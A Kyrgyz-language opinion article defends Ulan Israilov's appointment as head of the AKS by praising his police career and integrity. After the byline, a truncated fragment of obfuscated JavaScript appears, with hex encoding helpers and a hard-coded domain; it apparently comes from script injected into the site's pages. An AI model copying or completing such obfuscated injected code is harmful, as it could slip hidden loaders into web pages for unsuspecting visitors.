Menu

Ким эле начальник болуп төрөлүптүр?

Бөлүшүү:

АКС башчылыгына барган Улан Исраиловго карата социалдык түйүндөрдө жана маалымат каражаттарында бир топ сын пикирлер айтылды. Албетте, сын болуп турганы мыйзам ченемдүүлүк. Бирок, калыс мааниде дагы ой жүгүртөлү. Улан мырза бир топ жылдан бери күч түзүмү жаатында эмгектенип келатканын да эске салалык.

Алмаз Атамбаев оппозицияда жүргөн убакта ал жансакчы болуп иштеп жүрчү. Ага чейин милиция кызматкери катары да кызмат кылганы маалым. 2010-жылдан кийин У.Исраилов мурдагы кесибине кайтып келип, Свердлов РИИБсинин начальниги, андан соң ИИМдин 7-башкы башкармалыгына начальник болгону менен белгилүү. Иштеген адамда катачылыктар кетпей койбойт. Аныгында, ошол кемчиликтерин оңдогон, алдыга карай жеңишке умтулган адам гана өсөт эмеспи. Биз бул кадрды таптаза сүттөн ак катары сүрөттөгүбүз келбейт. Болгону, бир жактуу төө бастыга алуу багытын да тыңдап, каарманыбыздын артыкчылык сапаттарына токтололу.

Улан мырза булганбаган, жаш кадрлардын арасынан өзүнүн ордун таба алды. Ал карапайым турмуштан боор көтөргөн, чынчыл, адамгерчиликтүү жана интригадан алыс кадр. 2010-жылдан бери жетекчилик кызматтарды аркалап, өзүнүн көз карашы, ишке болгон анализи менен профессионалдуулук ишмердигин калптандырып, тажрыйба алуу багытында келатат. Ким эле начальник болуп төрөлүптүр? “Көч бара-бара түзөлөт” дегендей, У.Исраилов убакыттын өтүшү менен кызматтык жоопкерчилигин жогору сезип, өзүнүн милдеттерин камчы салдырбай аткарып келатат. Бу саам дагы АКС башчысы катары өзүнүн адилеттүүлүгүн көрсөтүп, мыйзамдын нугу аркылуу коррупция менен күрөшөрүнө ишене туралык. Жашоо али алдыда…

Адыл Жакшыбеков

Булак: “АЗИЯnews

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kyrgyztoday.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Эгер бул тексттен ката таап калсаңыз, ошол ката сөздү белгилеп, Ctrl+Enter кнопкаларын чоогу басуу менен билдирип коюңуз.

КОММЕНТАРИЙ КАЛТЫРУУ

Төмөндө көрсөтүлгөн уячаларга керектүү маалыматтарды туура киргизгениңизди текшериңиз.HTML-код киргизүүгө уруксат жок.

Captcha 83 − 74 =

ОКШОШ МАКАЛАЛАР

Меню

Орфографиялык ката тууралуу Отчет

Редакцияга төмөнкү текст жөнөтүлөт: